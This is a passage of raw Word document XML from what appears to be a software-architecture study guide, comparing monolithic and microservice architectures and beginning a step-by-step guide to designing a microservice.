    <w:p w14:paraId="1270FCE3" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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at is it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A24EF5"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n application is divided into a collection of small, loosely coupled services that communicate via APIs (usually REST or messaging systems like Kafka).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BBD336" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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haracteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2A006" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ch service is independently deployable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1E51E" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ch microservice has its own data store (DB per service pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F68B2" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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rvices can be written in different programming languages (polyglot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600425E" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00146B8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10E96AB">
          <v:rect id="_x0000_i2748" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FED17C" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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Monolith vs Microservices: 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7"/>
        <w:gridCol w:w="2705"/>
        <w:gridCol w:w="4691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="7F8971A0" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34B76ADF" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8B">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7B8BCB58" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8B">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Monolithic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D04E31C" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8B">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Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="17F81F53" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56D8F9C4"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chitecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CF2AABE"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ngle application unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="648D335B"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istributed system with many services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="7514F085" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24D670E5"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debase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51B5CE71"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e large codebase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46BDA94E"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ultiple small codebases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="4E15D214" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5C20B1"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ployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C5F023D"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ployed as a single unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E5B320"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ch service deployed independently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="0D7CA04B" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3629220E"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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="630C564A"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ertical (scale the whole app)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B57419A"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orizontal (scale individual services)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="49629AB7" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="011E0DBB"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velopment Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7901600C"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aster initially</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44CEB781"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lower initially, but scales well</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="7F0004D9" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66D649ED"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echnology Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45DEF512"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ame tech across the app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156C8391"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ch service can use a different stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="73D4AAFD" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EC6FB5C"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esting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72A5BC14"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sier end-to-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B2D4C4A"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lex due to inter-service dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="537A5596" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B0B2A2"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ailure Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55C1BB1B"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tire app may go down</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0433D4E0"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e service failure doesn’t necessarily affect others</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="59888367" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17324EE2"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atabase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00090374"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hared DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D63A53"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centralized DB per service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="5E727456" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6525FAA1"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munication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0CE81F"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process calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7331F434" w14:textId="77777777"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PI or messaging-based communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67E5F469" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00146B8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B6FA36">
          <v:rect id="_x0000_i2749" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE52EE" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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en to Choose Monolithic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B207F28" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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Go for Monolith when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BADD66" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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team is small (startups, MVPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC70EA" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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application is simple and won’t grow much.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15149934" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Quick development and deployment is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52460B59" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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re in the prototyping or early stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E3CA8" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00146B8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1A9A62A">
          <v:rect id="_x0000_i2750" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9E560" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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en to Choose Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4186BE" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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Go for Microservices when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAEBF6" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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pplication is large, complex, and will grow over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439AF40A" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ifferent parts of the system need to scale independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90FBE6" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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have multiple teams working in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C7F59" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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need high availability, fault tolerance, and agility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E362D" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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want flexibility in tech stacks or deployment pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DD701" w14:textId="77777777" w:rsidR="00B607F4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B607F4" w:rsidP="00146B8B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1D42BB" w14:textId="414B7F42" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095FCFD" w14:textId="27B5B23E"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onolith:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A92E82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blogging platform, early-stage ERP, internal admin tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251755E5" w14:textId="0083CF91" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8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Microservices:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A92E82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E-commerce platforms, fintech apps, enterprise SaaS, streaming platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46FFD2" w14:textId="77777777" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00146B8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92BA97D">
          <v:rect id="_x0000_i2751" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A106B4" w14:textId="762F3564" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE0C0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="671" w:name="_Toc196308151"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to design a microservice from scratch</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="671"/>
    </w:p>
    <w:p w14:paraId="33FED761" w14:textId="0E09251C" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="00D1759D">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signing a microservice from scratch requires a thoughtful approach that involves domain modeling, technology selection, infrastructure setup, and ensuring principles like loose coupling, scalability, and independent deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52996533" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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1B947E">
          <v:rect id="_x0000_i2752" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC41DF" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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Step-by-Step: Designing a Microservice from Scratch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407FAE0" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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1C9ABC">
          <v:rect id="_x0000_i2753" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71304EAB" w14:textId="197CFB88" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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w:t>
      </w:r>
      <w:r w:rsidR="00C26047" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Understand the Business Requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546FA84" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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arify the problem the microservice needs to solve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0598A8" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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dentify the boundaries of the service (Single Responsibility Principle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE44CA" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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DDD (Domain-Driven Design) to define aggregates and entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261D89E" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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B690CE4">
          <v:rect id="_x0000_i2754" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFFA12" w14:textId="3D8D8CFA" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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w:t>
      </w:r>
      <w:r w:rsidR="00C26047" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Define the Microservice Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E941C1" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="001C5037">
      <w:pPr>
        <w:ind w:firstLine="360"/>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sk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C7251" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
